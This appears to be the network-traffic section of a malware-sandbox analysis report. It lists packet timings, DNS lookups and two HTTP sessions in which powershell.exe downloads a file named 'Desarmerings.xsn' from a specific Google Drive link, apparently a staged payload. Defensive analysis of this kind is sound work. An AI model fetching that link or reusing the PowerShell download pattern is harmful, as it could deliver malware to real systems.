                                      Oct 1, 2024 07:46:47.072227001 CEST49707443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:46:47.072233915 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.077215910 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:46:47.077245951 CEST44349707142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.506572962 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.508675098 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.508723974 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.508749008 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.508791924 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.511095047 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.511159897 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.511169910 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.511214972 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.513325930 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.513376951 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.513438940 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.513478041 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.515814066 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.515867949 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.515888929 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.515933990 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.517353058 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.517463923 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.517476082 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.517523050 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.519865036 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.519913912 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.519928932 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.520004988 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.522172928 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.522228956 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.522247076 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.522298098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.524638891 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.524694920 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.524713993 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.524926901 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.526714087 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.526768923 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.526817083 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.526861906 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.529560089 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.529606104 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.529632092 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.529676914 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.533281088 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.533343077 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.533371925 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.533415079 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.538512945 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.538558006 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.538567066 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.538608074 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.538881063 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.538923979 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.538928986 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.538970947 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.541109085 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.541151047 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.541155100 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.541199923 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.542481899 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.542526007 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.542531013 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.542573929 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.543804884 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.543857098 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.543860912 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.543900013 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.546019077 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.546075106 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.546194077 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.546236038 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.546395063 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.546432972 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.546437025 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.546472073 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.547740936 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.547782898 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.547787905 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.547827005 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.549267054 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.549309969 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.549314976 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.549359083 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.551142931 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.551187992 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.551192999 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.551234961 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.552712917 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.552752972 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.552759886 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.552800894 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.554680109 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.554727077 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.554733992 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.554780960 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.556833029 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.556880951 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.556890011 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.556934118 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.558693886 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.558731079 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.558737993 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.558744907 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.558770895 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.558799028 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.560525894 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.560568094 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.560571909 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.560612917 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.562412024 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.562453032 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.562458992 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.562494040 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.564374924 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.564414978 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.564424992 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.564464092 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.566390991 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.566440105 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.566454887 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.566492081 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.568726063 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.568767071 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.568774939 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.568808079 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.570523977 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.570565939 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.570589066 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.570621014 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.572654009 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.572699070 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.572761059 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.572794914 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.574033022 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.574076891 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.574083090 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.574119091 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.575503111 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.575542927 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.575552940 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.575582027 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.577418089 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.577531099 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.577541113 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.577666044 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.581676960 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.581712008 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.581716061 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.581722975 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.581743956 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.581774950 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.581778049 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.581820965 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.582559109 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.582598925 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.582602978 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.582636118 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.584847927 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.584891081 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.584896088 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.584933996 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.586064100 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.586107016 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.586113930 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.586144924 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.587929964 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.587975025 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.587980986 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.588016033 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.590579987 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.590630054 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.590635061 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.590665102 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.592227936 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.592272997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.592278004 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.592313051 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.593043089 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.593084097 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.593087912 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.593117952 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.594907999 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.594954967 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.595098972 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.595138073 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.596540928 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.596590042 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.596595049 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.596626997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.597899914 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.597949028 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.597951889 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.597986937 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.599366903 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.599412918 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.599525928 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.599569082 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.601233959 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.601278067 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.601279974 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.601289034 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.601306915 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.601336002 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.602222919 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.602273941 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.602277994 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.602315903 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.604595900 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.604645967 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.604896069 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.604931116 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.605582952 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.605626106 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.605631113 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.605673075 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.607115030 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.607161045 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.607274055 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.607311010 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.609388113 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.609436035 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.609441996 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.609484911 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.609536886 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.609576941 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.609581947 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.609621048 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.614382982 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.614433050 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.614437103 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.614470959 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.614670992 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.614706039 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.614708900 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.614752054 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.614754915 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.614797115 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.615036011 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.615080118 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.623989105 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624042988 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624042988 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624053955 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624083042 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624119997 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624124050 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624166965 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.624577999 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.624620914 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628869057 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628920078 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628925085 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628972054 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.628976107 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.628994942 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629014969 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.629017115 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629025936 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.629045010 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.629081964 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632838011 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.632884979 CEST44349710142.250.185.97192.168.2.9
                                      Oct 1, 2024 07:47:22.632889032 CEST49710443192.168.2.9142.250.185.97
                                      Oct 1, 2024 07:47:22.632898092 CEST44349710142.250.185.97192.168.2.9
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Oct 1, 2024 07:46:42.414438963 CEST | 52353 | 53 | 192.168.2.9 | 1.1.1.1
                                      Oct 1, 2024 07:46:42.421252966 CEST | 53 | 52353 | 1.1.1.1 | 192.168.2.9
                                      Oct 1, 2024 07:46:43.474085093 CEST | 61489 | 53 | 192.168.2.9 | 1.1.1.1
                                      Oct 1, 2024 07:46:43.481461048 CEST | 53 | 61489 | 1.1.1.1 | 192.168.2.9
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Oct 1, 2024 07:46:42.414438963 CEST | 192.168.2.9 | 1.1.1.1 | 0x7664 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                      Oct 1, 2024 07:46:43.474085093 CEST | 192.168.2.9 | 1.1.1.1 | 0x4b05 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Oct 1, 2024 07:46:42.421252966 CEST | 1.1.1.1 | 192.168.2.9 | 0x7664 | No error (0) | drive.google.com |  | 216.58.206.78 | A (IP address) | IN (0x0001) | false
                                      Oct 1, 2024 07:46:43.481461048 CEST | 1.1.1.1 | 192.168.2.9 | 0x4b05 | No error (0) | drive.usercontent.google.com |  | 142.250.185.97 | A (IP address) | IN (0x0001) | false
                                      • drive.google.com
                                      • drive.usercontent.google.com
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.9 | 49706 | 216.58.206.78 | 443 | 7796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:46:43 UTC | 215 | OUT | GET /uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:46:43 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:46:43 GMT
                                      Location: https://drive.usercontent.google.com/download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-tzhSJ6tsFVi4sIizOVOfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.9 | 49707 | 142.250.185.97 | 443 | 7796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-10-01 05:46:44 UTC | 233 | OUT | GET /download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:46:46 UTC | 4848 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="Desarmerings.xsn"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 476220
                                      Last-Modified: Mon, 30 Sep 2024 07:24:24 GMT
